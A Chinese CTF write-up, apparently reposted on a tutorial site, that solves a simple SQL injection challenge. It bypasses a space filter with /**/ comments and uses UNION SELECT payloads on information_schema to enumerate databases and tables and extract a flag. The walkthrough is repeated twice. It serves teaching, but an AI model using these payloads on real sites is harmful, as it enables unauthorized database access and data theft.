分享一個(gè)簡單的sql注入
所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來說,它是利用現(xiàn)有應(yīng)用程序,將(惡意)的SQL命令注入到后臺數(shù)據(jù)庫引擎執(zhí)行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫,而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語句。比如先前的很多影視網(wǎng)站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。
分別輸入1,2,3有對應(yīng)的結(jié)果

使用'會報(bào)錯(cuò),于是
構(gòu)造常用的sql語句:1' and '1'='1

沒有反應(yīng)試一試1' and '1'='2

還是沒反應(yīng),工具提示,應(yīng)該是過濾了什么,改一下sql語句試一試
1and1=1

可以顯示東西,經(jīng)過判斷過濾了空格,我們使用/**/來代替空格
試一試1'/**/and/**/'1'='1
發(fā)現(xiàn)有結(jié)果了:
于是構(gòu)建sql語句:
判斷有那些數(shù)據(jù)庫:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
可以看到結(jié)果:

查看有哪些數(shù)據(jù)表:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

發(fā)現(xiàn)了flag的表,我們猜測應(yīng)該是在web1數(shù)據(jù)庫中并且字段就是flag(其實(shí)就在本頁面的數(shù)據(jù)庫中)
故:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

本人也是初學(xué)者,參考了許多大佬的wp 自己寫出來后有什么錯(cuò)誤的地方,希望大家指出,謝謝!
根據(jù)頁面提示,到底過濾了什么東西?可以知道一定過濾了什么....
分別輸入1,2,3有對應(yīng)的結(jié)果

使用'會報(bào)錯(cuò),于是
構(gòu)造常用的sql語句:1' and '1'='1

沒有反應(yīng)試一試1' and '1'='2

還是沒反應(yīng),工具提示,應(yīng)該是過濾了什么,改一下sql語句試一試
1and1=1

可以顯示東西,經(jīng)過判斷過濾了空格,我們使用/**/來代替空格
試一試1'/**/and/**/'1'='1
發(fā)現(xiàn)有結(jié)果了:
于是構(gòu)建sql語句:
判斷有那些數(shù)據(jù)庫:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
可以看到結(jié)果:

查看有哪些數(shù)據(jù)表:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

發(fā)現(xiàn)了flag的表,我們猜測應(yīng)該是在web1數(shù)據(jù)庫中并且字段就是flag(其實(shí)就在本頁面的數(shù)據(jù)庫中)
故:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

總結(jié)
以上所述是小編給大家介紹的一個(gè)簡單的sql注入,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時(shí)回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
相關(guān)文章
簡單判斷MSSQL數(shù)據(jù)庫版本(2000或者2005)
這篇文章主要介紹了簡單判斷MSSQL數(shù)據(jù)庫版本(2000或者2005),需要的朋友可以參考下2015-01-01
sqlserver 中一些??吹闹笜?biāo)和清除緩存的方法
sqlserver 中一些??吹闹笜?biāo)和清除緩存的方法2009-07-07
sql server2012附加數(shù)據(jù)庫問題解決方法
這篇文章主要介紹了sql server2012附加數(shù)據(jù)庫問題解決方法,需要的朋友可以參考下2014-05-05
使用 GUID 值來作為數(shù)據(jù)庫行標(biāo)識講解
使用 GUID 值來作為數(shù)據(jù)庫行標(biāo)識講解...2007-05-05
存儲過程解密(破解函數(shù),過程,觸發(fā)器,視圖.僅限于SQLSERVER2000)
解密指定存儲過程 exec sp_decrypt '存儲過程名'2009-05-05
多表關(guān)聯(lián)同時(shí)更新多條不同的記錄方法分享
因?yàn)轫?xiàng)目要求實(shí)現(xiàn)一次性同時(shí)更新多條不同的記錄的需求,和同事討論了一個(gè)比較不錯(cuò)的方案,這里供大家參考下2011-10-10

